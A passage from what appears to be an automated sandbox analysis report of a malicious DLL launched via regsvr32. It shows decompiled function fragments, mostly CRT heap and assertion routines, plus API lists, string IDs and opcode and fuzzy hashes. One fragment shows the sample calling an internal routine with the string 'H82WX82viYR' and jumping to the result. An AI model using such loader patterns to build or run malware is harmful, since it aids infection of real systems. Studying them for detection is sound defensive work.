				E000007FE7FEF9D211E0(_t7, _t8, "H82WX82viYR", _t10); // executed
				 *__rax(); // executed
				return 0;
			}






                                    0x7fef9d23114
                                    0x7fef9d23122
                                    0x7fef9d23127
                                    0x7fef9d2312f

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExitProcessUser
                                    • String ID: H82WX82viYR
                                    • API String ID: 3902816426-3887106525
                                    • Opcode ID: 9520d05ee5257cfcb6870757d168f5deeb70c535bf89830e30f839e103e3a1eb
                                    • Instruction ID: 3c31bc9bae0aa088b32ec31719daf081635377c5f01f1f7dd7abf53af6b9f495
                                    • Opcode Fuzzy Hash: 9520d05ee5257cfcb6870757d168f5deeb70c535bf89830e30f839e103e3a1eb
                                    • Instruction Fuzzy Hash: 0DC04C11F2550381EA4467E6AC861AC12A16785790FA19421D55C86231DE6E92964B02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D27540 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 62%
                                    			E000007FE7FEF9D27540(long long __rax) {
				long long _v24;
				void* _t8;
				void* _t9;

				_t16 = __rax;
				_t9 = E000007FE7FEF9D23D00(_t8); // executed
				_v24 = __rax;
				return E000007FE7FEF9D2CF20(E000007FE7FEF9D2CFB0(E000007FE7FEF9D2D450(E000007FE7FEF9D2D470(E000007FE7FEF9D2BD50(E000007FE7FEF9D2AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
			}






                                    0x7fef9d27540
                                    0x7fef9d27544
                                    0x7fef9d27549
                                    0x7fef9d2758e

                                    APIs
                                      • Part of subcall function 000007FEF9D23D00: RtlEncodePointer.NTDLL ref: 000007FEF9D23D06
                                    • _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                    • _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                      • Part of subcall function 000007FEF9D2CF20: EncodePointer.KERNEL32(?,?,?,?,000007FEF9D2758A,?,?,?,?,?,?,000007FEF9D23D39), ref: 000007FEF9D2CF30
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                    • String ID:
                                    • API String ID: 2678799220-0
                                    • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                    • Instruction ID: d1131ca10be328b200f0d94da683d71e83c9d45f094ccb2362bb8b9ac37f618d
                                    • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                    • Instruction Fuzzy Hash: CFE07D6391D58181E6B0BB21EC5226E93B0F7C8788F610171B6CD47A7BCE1DE9018B80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2ACA8 Relevance: 3.0, APIs: 2, Instructions: 15memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExitProcess$AllocateHeap__crt
                                    • String ID:
                                    • API String ID: 4215626177-0
                                    • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                    • Instruction ID: 018cd22ed3aaffe80bc67b356604b0c029bcf26b5d2cff022e0890546f5cf117
                                    • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                    • Instruction Fuzzy Hash: AFE04F2490898683E7A49726E80037D63E0FB84348F614036D7CE026F5CF2FE840E601
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800178A8 Relevance: 1.6, APIs: 1, Instructions: 122processCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 04cf030d77e645320339c33741cb4d53f5c8d6a2e25ff01d0d4939bc2732d238
                                    • Instruction ID: 2da17281d2a08d1ac9b8a996dbaf27e8716b5e9a88d25284efbd0f172fd1731a
                                    • Opcode Fuzzy Hash: 04cf030d77e645320339c33741cb4d53f5c8d6a2e25ff01d0d4939bc2732d238
                                    • Instruction Fuzzy Hash: 7041417051CB848FDBB8DF18E48979AB7E0FB88314F104A5DE48EC7245DB749885CB86
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D24399 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E000007FE7FEF9D24399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {

				_a48 = __rax;
				if (_a48 == 0) goto 0xf9d243ad;
				goto 0xf9d243f5;
				if (_a88 != 0) goto 0xf9d243ce;
				if (_a120 == 0) goto 0xf9d243c7;
				 *_a120 = 0xc;
				goto 0xf9d243f5;
				if (E000007FE7FEF9D2ABB0(_a48, _a80) != 0) goto 0xf9d243f3;
				if (_a120 == 0) goto 0xf9d243ef;
				 *_a120 = 0xc;
				goto 0xf9d243f5;
				goto 0xf9d24377;
				return 0;
			}



                                    0x7fef9d24399
                                    0x7fef9d243a4
                                    0x7fef9d243ab
                                    0x7fef9d243b2
                                    0x7fef9d243ba
                                    0x7fef9d243c1
                                    0x7fef9d243cc
                                    0x7fef9d243da
                                    0x7fef9d243e2
                                    0x7fef9d243e9
                                    0x7fef9d243f1
                                    0x7fef9d243f3
                                    0x7fef9d243f9

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                    • Instruction ID: 1adc9abf0de1c3ca8893cd90e215b0d97e51771cadcbd8eff06287440f46b9d2
                                    • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                    • Instruction Fuzzy Hash: 8B01B332A5CB41C6F7A08A55E84472EA7E0F7C4794F321121AECD42BB8CB7DE440CA00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D23471 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _ioterm
                                    • String ID:
                                    • API String ID: 4163092671-0
                                    • Opcode ID: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                    • Instruction ID: 7377a742d64af20529275359c4a94eabcf7c0d21081332a84b693dd33c507e1a
                                    • Opcode Fuzzy Hash: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                    • Instruction Fuzzy Hash: F4F03720C0C10789FAE16778AC0A37CA1D1A711B91F3252F5A0DC821F2D77FB54A8A12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D23433 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ioterm.LIBCMTD ref: 000007FEF9D23437
                                      • Part of subcall function 000007FEF9D27D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2343C), ref: 000007FEF9D27D93
                                      • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                      • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                      • Part of subcall function 000007FEF9D288D0: HeapDestroy.KERNELBASE ref: 000007FEF9D288DB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                    • String ID:
                                    • API String ID: 1508997487-0
                                    • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                    • Instruction ID: 18d5f63124407e78997e2f664e67049843f9c9ac3d7a6681d0ffcba3130af5de
                                    • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                    • Instruction Fuzzy Hash: 50E06760E0C1439AF6D567B46C423BD91D06B54BC1FB245B2A1CE862F3EA5FB8014662
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D288D0 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: DestroyHeap
                                    • String ID:
                                    • API String ID: 2435110975-0
                                    • Opcode ID: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                    • Instruction ID: df5636f5ee55eb5a1123ad47329e94e2a1af4504a4e9b44811c9c5941fd1bffd
                                    • Opcode Fuzzy Hash: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                    • Instruction Fuzzy Hash: 6CC04C64D15A01C1EA445726FC8536822A06394745FA0C021C5CD012308B2F55968701
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D23D00 Relevance: 1.5, APIs: 1, Instructions: 5COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EncodePointer
                                    • String ID:
                                    • API String ID: 2118026453-0
                                    • Opcode ID: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                    • Instruction ID: 5c830059afc01ab3dffeb0f702370a5898bb96dd38ab511ff450623a486f5942
                                    • Opcode Fuzzy Hash: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                    • Instruction Fuzzy Hash: F1A00224F16591D7DAAC373A5D9713D11A06B68709FF05869C74F40261CE2F92FE8B05
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 000007FEF9D30215 Relevance: 89.7, APIs: 29, Strings: 22, Instructions: 441COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
                                    • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                    • API String ID: 4197005980-4190456261
                                    • Opcode ID: 91caf2df9a40c10ca931429e5e540051a4e8143577a7dc19426bf0d901356392
                                    • Instruction ID: 4be8715b722ea95f30444376ecaecfb3c385eb747484933fb25f7726159d970d
                                    • Opcode Fuzzy Hash: 91caf2df9a40c10ca931429e5e540051a4e8143577a7dc19426bf0d901356392
                                    • Instruction Fuzzy Hash: 5C422C31A0CA8691E7B0CB14E8547EE73E4F784345FA08226D6CD43AA9DF7EE549CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D30CC0 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 140libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                    • API String ID: 2256938910-232180764
                                    • Opcode ID: 4136024d25ab454011a9418e3e33b4ea31b56a31dc25d7fc48a91c666a4aba5f
                                    • Instruction ID: 2fdcab7defb259cab3e0ae5c8194edaf0e6743a208e28eb4b7718d98c4970bd2
                                    • Opcode Fuzzy Hash: 4136024d25ab454011a9418e3e33b4ea31b56a31dc25d7fc48a91c666a4aba5f
                                    • Instruction Fuzzy Hash: F581C531A09B8686E7A09B19FC4436EB3E0F784795F608135DACE42678DF7EE448CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D24A70 Relevance: 30.3, APIs: 2, Strings: 15, Instructions: 504COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$Invalid allocation size: %Iu bytes.$Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$_pFirstBlock == pOldBlock$_pLastBlock == pOldBlock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$fRealloc || (!fRealloc && pNewBlock == pOldBlock)$pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
                                    • API String ID: 0-1181733849
                                    • Opcode ID: caf568ba67e02e981cee0a62def33bb5426de77b0166e0249518d1aed8fc28ed
                                    • Instruction ID: 672275d76b56a31b76a57beb3bef09bdc1cc68057209de26ab42cab730db0c01
                                    • Opcode Fuzzy Hash: caf568ba67e02e981cee0a62def33bb5426de77b0166e0249518d1aed8fc28ed
                                    • Instruction Fuzzy Hash: 27421F31A0DB8585EBA08B69E88076EB7E0F785790F214136DADD83BB4DB7ED440CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D253FB Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 267memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • _CrtIsValidHeapPointer(pUserData), xrefs: 000007FEF9D254E2
                                    • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 000007FEF9D25558
                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25683
                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D2579F
                                    • Client hook free failure., xrefs: 000007FEF9D254A0
                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2573C
                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 000007FEF9D254F7, 000007FEF9D2556D, 000007FEF9D257FE
                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25620
                                    • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 000007FEF9D257E9
                                    • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 000007FEF9D2542B
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: HeapPointerValid_free_base
                                    • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                    • API String ID: 1656799702-182684663
                                    • Opcode ID: 5020832333ec35d85279f4adfeb03ce22c38d55cbbbf155ecd90f9052befc044
                                    • Instruction ID: a89e9ee482389454aa7ea2a98c74fcfc2c6f72e51cab5ee636fbf14708ed73c9
                                    • Opcode Fuzzy Hash: 5020832333ec35d85279f4adfeb03ce22c38d55cbbbf155ecd90f9052befc044
                                    • Instruction Fuzzy Hash: 51C17D36A18B4586EBA48B59E88076EB7E0F785790F614536EBCD43BB4DB7ED440CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D25CAD Relevance: 17.8, Strings: 14, Instructions: 322COMMON
                                    Download Yara Rule
                                    Strings
                                    • _heapchk fails with unknown return value!, xrefs: 000007FEF9D25DAF
                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 000007FEF9D260FA
                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                    • _heapchk fails with _HEAPBADBEGIN., xrefs: 000007FEF9D25CE5
                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                    • _heapchk fails with _HEAPBADNODE., xrefs: 000007FEF9D25D19
                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25F42
                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D26030
                                    • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                    • _1, xrefs: 000007FEF9D261FC
                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                    • DAMAGED, xrefs: 000007FEF9D25E7D
                                    • _heapchk fails with _HEAPBADEND., xrefs: 000007FEF9D25D4D
                                    • _heapchk fails with _HEAPBADPTR., xrefs: 000007FEF9D25D7E
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).$_heapchk fails with _HEAPBADBEGIN.$_heapchk fails with _HEAPBADEND.$_heapchk fails with _HEAPBADNODE.$_heapchk fails with _HEAPBADPTR.$_heapchk fails with unknown return value!$_1
                                    • API String ID: 0-510578482
                                    • Opcode ID: ecaeb8f0e9f50f2af9e26624824c00194ce636c943c5c9e443a2ba6a1604b1b7
